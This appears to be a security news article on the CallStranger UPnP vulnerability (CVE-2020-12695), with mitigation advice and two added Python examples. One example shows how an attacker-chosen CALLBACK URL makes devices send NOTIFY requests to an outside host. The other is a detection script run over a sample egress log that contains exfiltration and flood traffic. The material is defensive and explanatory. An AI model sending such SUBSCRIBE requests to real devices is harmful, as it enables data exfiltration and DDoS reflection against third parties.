Billions of devices that use UPnP are currently at risk from a vulnerability. The flaw, called CallStranger, allows data exfiltration, distributed denial of service (DDoS) attacks, and scanning of internal networks.
Universal Plug and Play (UPnP) is a set of device protocols used to automatically discover and interact with devices on a network. It is intended for local use in a trusted network, as it requires no authentication or verification. Routers and other devices expose UPnP so that clients on the LAN can discover and control them.
The CallStranger vulnerability CVE-2020-12695
The vulnerability CVE-2020-12695, known as CallStranger, was discovered by security researcher Yunus Çadirci and reported to the Open Connectivity Foundation (OCF) on December 12, 2019 (see this CallStranger web page). The OCF is the organization responsible for the UPnP specification.
— Yunus ÇADIRCI (@yunuscadirci) June 8, 2020
The CallStranger vulnerability, found in billions of UPnP devices, can be used to exfiltrate data (even if you have appropriate DLP/protection), scan a network, or even exploit the network for a DDoS attack, the researcher writes on GitHub.
CallStranger is caused by the CALLBACK header of the UPnP SUBSCRIBE request being fully attacker-controlled: the device stores the supplied URL and later sends HTTP NOTIFY messages to it, wherever it points. This gives an SSRF-like primitive that affects millions of Internet-facing devices and billions of LAN devices.
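To make the mechanism concrete, here is an added Python example (not code from the original post or from Çadirci's CallStranger tooling). It parses a constructed SUBSCRIBE request, shows the pre-fix behaviour of accepting any CALLBACK URL, a hardening check that only accepts callbacks pointing back at the subscriber's own address, and the NOTIFY the device would then send. The sample request, the IP addresses and the exact validation rule are assumptions of this example, not the wording of the UPnP specification.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample SUBSCRIBE request (not a real capture). The CALLBACK value is
# chosen entirely by the subscriber, which is the root of CallStranger.
SAMPLE_SUBSCRIBE = (
    "SUBSCRIBE /upnp/event/WANIPConnection HTTP/1.1\r\n"
    "HOST: 192.168.1.1:1900\r\n"
    "CALLBACK: <http://203.0.113.10:8080/collect>\r\n"
    "NT: upnp:event\r\n"
    "TIMEOUT: Second-1800\r\n"
    "\r\n"
)


def parse_headers(raw):
    """Split an HTTP request into (request line, {UPPER-CASE header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().upper()] = value.strip()
    return lines[0], headers


def parse_callback_urls(callback_value):
    """CALLBACK holds one or more <url> entries; the device delivers events to each."""
    return re.findall(r"<([^>]+)>", callback_value)


def vulnerable_accept(callback_value, subscriber_ip):
    """Pre-fix behaviour: every callback URL is accepted verbatim, whatever it points at."""
    return parse_callback_urls(callback_value)


def hardened_accept(callback_value, subscriber_ip):
    """Assumed mitigation for this example: keep only http:// URLs whose host is an IP
    literal equal to the subscriber's own address. DNS names are rejected because they
    could resolve anywhere, so a third-party host can never become a NOTIFY target."""
    try:
        subscriber = ipaddress.ip_address(subscriber_ip)
    except ValueError:
        return []
    accepted = []
    for url in parse_callback_urls(callback_value):
        parts = urlsplit(url)
        if parts.scheme != "http" or not parts.hostname:
            continue
        try:
            host = ipaddress.ip_address(parts.hostname)
        except ValueError:
            continue
        if host == subscriber:
            accepted.append(url)
    return accepted


def build_notify(url, sid, seq, event_xml):
    """The NOTIFY a device sends to a callback URL. The request target carries whatever
    path and query the subscriber embedded (the exfiltration channel), and the host in
    the URL receives the traffic (the DDoS reflection target)."""
    parts = urlsplit(url)
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    body = event_xml.encode()
    head = (
        f"NOTIFY {target} HTTP/1.1\r\n"
        f"HOST: {parts.netloc}\r\n"
        'CONTENT-TYPE: text/xml; charset="utf-8"\r\n'
        f"CONTENT-LENGTH: {len(body)}\r\n"
        "NT: upnp:event\r\n"
        "NTS: upnp:propchange\r\n"
        f"SID: {sid}\r\n"
        f"SEQ: {seq}\r\n"
        "\r\n"
    )
    return head.encode() + body


if __name__ == "__main__":
    _, hdrs = parse_headers(SAMPLE_SUBSCRIBE)
    print("vulnerable:", vulnerable_accept(hdrs["CALLBACK"], "192.168.1.50"))
    print("hardened:  ", hardened_accept(hdrs["CALLBACK"], "192.168.1.50"))
    print(build_notify(hdrs["CALLBACK"].strip("<>"), "uuid:1", 0, "<e/>").decode())
```

Run with the sample request, the vulnerable path hands back the external URL and the hardened path returns nothing, because the callback host (203.0.113.10) is not the subscribing client (192.168.1.50). Note that binding the callback to the subscriber address still lets a LAN attacker receive events about the device; it only stops the device being turned into a relay towards other hosts.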
A fix takes time
The colleagues at Bleeping Computer write here that a patch has been available for two months: the OCF has published a revised version 2.0 of the UPnP specification that addresses the issue. The problem is that the fix has to be implemented in the firmware of every affected device by its vendor and then installed by the user. This will take time; many devices are no longer supported and will never receive an update, and even supported devices are often not updated by their users.
Affected devices and mitigations
Bleeping Computer quotes Çadirci as saying that not all UPnP stacks are vulnerable; MiniUPnP, for example, is not. Çadirci has published this page with a list of vulnerable devices. In the absence of an updated UPnP stack, he recommends the following risk mitigation steps:
- Disable unnecessary UPnP services, especially on devices/interfaces exposed to the Internet.
- Check intranet and server networks to ensure that UPnP devices (routers, IP cameras, printers, media gateways, etc.) cannot be used for data exfiltration.
- Scan network security logs to verify whether this vulnerability has already been exploited by a threat actor.
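As an added example for the log-scanning step (my illustration, not a tool from Çadirci or the original post), the Python script below runs a simple detection over a constructed egress log. Because the CALLBACK header is only visible on the device itself, what an egress or proxy log can show is the outbound HTTP NOTIFY traffic an abused device generates: NOTIFYs leaving for an external host indicate exfiltration (data in the request target) or DDoS reflection (many NOTIFYs to one host). The log format, the address ranges treated as internal and the flood threshold are assumptions; adapt them to your own firewall or proxy logs.

```python
import ipaddress
from collections import Counter

# Constructed sample of an egress log (not a real capture), one record per line:
# timestamp  source-ip  destination[:port]  HTTP-method  request-target
# The router 192.168.1.1 is the UPnP device; lines 1 and 3-6 are what CallStranger abuse looks like.
SAMPLE_LOG = """\
2020-06-09T10:14:02Z 192.168.1.1 203.0.113.10:8080 NOTIFY /collect?d=Zm9vYmFy
2020-06-09T10:14:03Z 192.168.1.1 192.168.1.50:49152 NOTIFY /events
2020-06-09T10:14:05Z 192.168.1.1 198.51.100.7:80 NOTIFY /
2020-06-09T10:14:05Z 192.168.1.1 198.51.100.7:80 NOTIFY /
2020-06-09T10:14:06Z 192.168.1.1 198.51.100.7:80 NOTIFY /
2020-06-09T10:14:06Z 192.168.1.1 198.51.100.7:80 NOTIFY /
2020-06-09T10:14:07Z 192.168.1.50 93.184.216.34:443 GET /index.html
2020-06-09T10:14:08Z 192.168.1.23 192.168.1.1:1900 SUBSCRIBE /upnp/event/WANIPConnection
"""

# Assumed definition of "internal": RFC 1918, link-local and loopback. Listed explicitly
# rather than via ipaddress.is_private, which also treats documentation ranges as private.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "127.0.0.0/8")
]
FLOOD_THRESHOLD = 3  # assumed: this many NOTIFYs to one external host is a reflection flood


def parse_line(line):
    """Parse one log record into a dict; a destination without a port defaults to 80."""
    ts, src, dst, method, target = line.split(" ", 4)
    host, sep, port = dst.rpartition(":")
    if not sep:
        host, port = dst, "80"
    return {"ts": ts, "src": src, "dst": host, "port": int(port), "method": method, "target": target}


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def analyze(log_text, flood_threshold=FLOOD_THRESHOLD):
    """Flag NOTIFY traffic leaving the LAN: a callback URL pointing outside the network
    makes a vulnerable device generate exactly this. LAN-internal NOTIFYs are normal."""
    external = []
    per_pair = Counter()
    suspect_exfil = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        if rec["method"] != "NOTIFY" or not is_external(rec["dst"]):
            continue
        external.append(rec)
        per_pair[(rec["src"], rec["dst"])] += 1
        # Attacker-chosen data rides in the path/query of the callback URL (assumed heuristic:
        # a query string or an unusually long target).
        if "?" in rec["target"] or len(rec["target"]) > 64:
            suspect_exfil.append(rec["target"])
    floods = {pair: n for pair, n in per_pair.items() if n >= flood_threshold}
    return {"external_notify": external, "flood_targets": floods, "suspect_exfil": suspect_exfil}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for rec in result["external_notify"]:
        print(f"{rec['ts']} {rec['src']} -> {rec['dst']}:{rec['port']} NOTIFY {rec['target']}")
    print("flood targets:", result["flood_targets"])
    print("possible exfiltration:", result["suspect_exfil"])
```

Any NOTIFY from a UPnP device to an address outside the listed ranges deserves a look; in a network that never expects UPnP event delivery across the perimeter, the same condition can be turned directly into an egress firewall rule.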
Users should also contact the manufacturer of their devices to find out whether an update is available or planned. Users can also ask their ISP whether DDoS protection is offered (this only makes sense if the ISP has solutions that can block the traffic generated by UPnP SUBSCRIBE callbacks, i.e. HTTP NOTIFY).